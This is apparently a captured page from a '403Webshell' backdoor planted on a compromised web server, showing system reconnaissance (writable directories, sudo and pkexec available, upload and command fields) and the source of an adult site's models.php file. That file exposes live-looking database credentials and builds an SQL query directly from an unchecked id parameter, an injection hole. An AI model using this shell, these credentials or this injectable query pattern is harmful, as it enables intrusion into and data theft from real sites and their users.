403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.185
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/handjobcafe.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/handjobcafe.com/public_html/models.php
<?php
$config[database] = 'y27qpdhz';
$config[db_host] = 'localhost';
$config[db_user] = 'feswosc1';
$config[db_pass] = 'zvr0!17wvtpn';
mysql_connect($config[db_host], $config[db_user], $config[db_pass]);
mysql_select_db($config[database]);
?>
<!DOCTYPE html>
<html class="no-js">
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <title>exclusive videos</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width">
        <link rel="stylesheet" href="./css/models.css">
		<!--[if gte IE 9]>
			<style type="text/css">
				.gradient {
					filter: none;
				}
			</style>
		<![endif]-->
		<style>
			body { background-color:#000; }
			.basic { float:right; }
			p { margin:5px;font-family:Lato;font-size:16px; }
			#wrapper { width:980px; background-color:#FFF;margin:0 auto;box-shadow:0px 0px 10px #FFF; }
		</style>
    </head>
	
    <body id="videos">
		<div id="wrapper">
			<div id="header">
				<header>
					<div class="topadd" style="text-align:center;">
						<img src="./images/header.jpg">
						<p class="nav" style="text-align:center;width:90%;font-size:16px;margin:0px auto;font-weight:bold;font-family:Lato;">
							<ul class="buttons">
								<?php if($_GET[id])
								{ ?>
									<li><a href="/models.php">Back to Models</a></li>
								<?php }
								else
								{ ?>
									<li><a href="/tour.php">Back to Tour</a></li>
								<?php } ?>
								<li><a href="/members">Members Enter</a></li>
								<li><a href="/join.html">Join Now</a></li>
							</ul>
						</p>
					</div>
				</header>

				<?php if($_GET['id'])
				{
					$sql = mysql_query("SELECT * FROM models WHERE site='handjobcafe.com' AND id=$_GET[id]");

					while($r = mysql_fetch_array($sql))
					{
						$id	= $r['id'];
						$name = stripslashes($r['name']);
						$folder	= $r['folder'];
						$bio = stripslashes($r['bio']);
						$hometown = stripslashes($r['hometown']);
						$age = $r['age'];
						$eyes = $r['eyes'];
						$height	= stripslashes($r['height']);
						$status	= $r['status'];
						$ethnicity = $r['ethnicity'];
						$measurements = $r['measurements'];
						$birthplace = $r['birthplace'];
						$hair = $r['hair'];
						$dob = $r['dob'];
					}
					?>

					<div style="margin:10px auto;width:960px;clear:both;overflow:auto;border-radius:5px;border:1px solid #999;box-shadow:0px 0px 10px #999;background: #fcecfc; background: -moz-linear-gradient(top,  #fcecfc 0%, #f9d1ed 51%, #fcccec 55%, #f9edf5 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#fcecfc), color-stop(51%,#f9d1ed), color-stop(55%,#fcccec), color-stop(100%,#f9edf5)); background: -webkit-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: -o-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: -ms-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: linear-gradient(to bottom,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fcecfc', endColorstr='#f9edf5',GradientType=0 ); ">

						<div style="margin:0 auto;width:33.3333%;text-align:center;float:left;">
							<img src="/models/<?php print $folder; ?>/main.jpg" style="width:300px;margin:10px;box-shadow:0px 0px 8px #999;border-radius:8px;">
						</div>
						<div style="width:66.6666%;float:right;">
							<h2 style="font-size:36px;"><?php print $name;  ?></h2>
							<?php if($ethnicity){ ?><p><strong>Ethnicity: </strong><?php print $ethnicity; ?></p><?php } ?>
							<?php if($dob){ ?><p><strong>Date of Birth: </strong><?php print $dob; ?></p><?php } ?>
							<?php if($hair){ ?><p><strong>Hair Color: </strong><?php print $hair; ?></p><?php } ?>
							<?php if($eyes){ ?><p><strong>Eye Color: </strong><?php print $eyes; ?></p><?php } ?>
							<?php if($measurements){ ?><p><strong>Measurements: </strong><?php print $measurements; ?></p><?php } ?>
							<?php if($birthplace){ ?><p><strong>Birthplace: </strong><?php print $birthplace; ?></p><?php } ?>
							<?php if($hometown){ ?><p><strong>Hometown: </strong><?php print $hometown; ?></p><?php } ?>
							<?php if($age){ ?><p><strong>Age: </strong><?php print $age; ?></p><?php } ?>
							<?php if($height){ ?><p><strong>Height: </strong><?php print $height; ?></p><?php } ?>
							<?php if($status){ ?><p><strong>Status: </strong><?php print $status; ?></p><?php } ?>
							<p style=""><strong>Bio: </strong><?php print $bio; ?></p>
						</div>
					</div>

					<div style="margin:auto; padding:5px; text-align:center;width:960px;">

						<div style="float:left;"><img src="./images/handjob-cafe-logo.png" style="width:100px;"></div>

						<div style="font-family: Lato;font-size: 22px;text-align:center;line-height:30px;font-weight: 900;float:left;width:760px;">HIGH RESOLUTION PHOTOS FEATURED IN OUR MEMBERS AREA!</div>

						<div style="float:right;"><img src="./images/handjob-cafe-logo.png" style="width:100px;"></div>

					</div>

					<div style="margin:10px auto;width:960px;clear:both;overflow:auto; border-radius:5px;border:1px solid #999;box-shadow:0px 0px 10px #999;background: #fcecfc; background: -moz-linear-gradient(top,  #fcecfc 0%, #f9d1ed 51%, #fcccec 55%, #f9edf5 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#fcecfc), color-stop(51%,#f9d1ed), color-stop(55%,#fcccec), color-stop(100%,#f9edf5)); background: -webkit-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: -o-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: -ms-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: linear-gradient(to bottom,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fcecfc', endColorstr='#f9edf5',GradientType=0 );">
						
						<?php
						if ($handle = opendir('/home/httpd/html/handjobcafe.com/public_html/models/' . $folder . ''))
						{
							while (false !== ($entry = readdir($handle))) 
							{
								if ($entry != "." && $entry != ".." && stristr($entry, "wide"))
								{
									print '<div style="width:190px;height:190px;float:left;text-align:center;"><span style=" display: inline-block;height: 100%;vertical-align: middle;"></span><img src="/models/' . $folder . '/' . $entry . '" style="border-radius:2px;vertical-align:middle;box-shadow:0px 0px 7px #999;width:180px;"></div>';
									if($countw++ == "4")
									{
										break;
									}
								}
							}
							closedir($handle);
						}?>
					</div>

					<div style="margin:10px auto;width:960px;clear:both;overflow:auto;border-radius:5px;border:1px solid #999;box-shadow:0px 0px 10px #999;background: #fcecfc; background: -moz-linear-gradient(top,  #fcecfc 0%, #f9d1ed 51%, #fcccec 55%, #f9edf5 100%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#fcecfc), color-stop(51%,#f9d1ed), color-stop(55%,#fcccec), color-stop(100%,#f9edf5)); background: -webkit-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: -o-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: -ms-linear-gradient(top,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); background: linear-gradient(to bottom,  #fcecfc 0%,#f9d1ed 51%,#fcccec 55%,#f9edf5 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fcecfc', endColorstr='#f9edf5',GradientType=0 );">

						<?php
						if ($handle = opendir('/home/httpd/html/handjobcafe.com/public_html/models/' . $folder . ''))
						{
							while (false !== ($entry = readdir($handle)))
							{
								if ($entry != "." && $entry != ".." && stristr($entry, "tall"))
								{
									print '<div style="width:160px;height:200px;float:left;text-align:center;"><span style=" display: inline-block;height: 100%;vertical-align: middle;"></span><img src="/models/' . $folder . '/' . $entry . '" style="border-radius:2px;vertical-align:middle;box-shadow:0px 0px 7px #999;width:119px"></div>';
									if($countt++ == "5")
									{
										break;
									}

								}
							}
							closedir($handle);
						}?>
					</div>

				<?php }
				else
				{ ?>
					<div class="thumb_block" style="width:960px; margin:0 auto;">
						<?php
						$sql = mysql_query("SELECT * FROM models WHERE site='handjobcafe.com' AND added<=NOW() order by rand()");

						while($r = mysql_fetch_array($sql))
						{
							$model_id = $r['id'];
							$model_site = $r['site'];
							$model_name	= $r['name'];
							$model_folder = $r['folder'];
						?>

							<div class="each">
								<h2><?php print $model_name; ?></h2>
								<a href="/models.php?id=<?php print $model_id; ?>">
								<img src="/models/<?php print $model_folder; ?>/main.jpg" width="295" alt="" /></a>
								<br>
							</div>
						<?php } ?>
					</div>
				<?php } ?>
				
				<p style="clear:both;height:30px;"></p>
			
			</div>

			<footer>
				<div class="bottomadd"></div>
			</footer>
		</div>
	</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit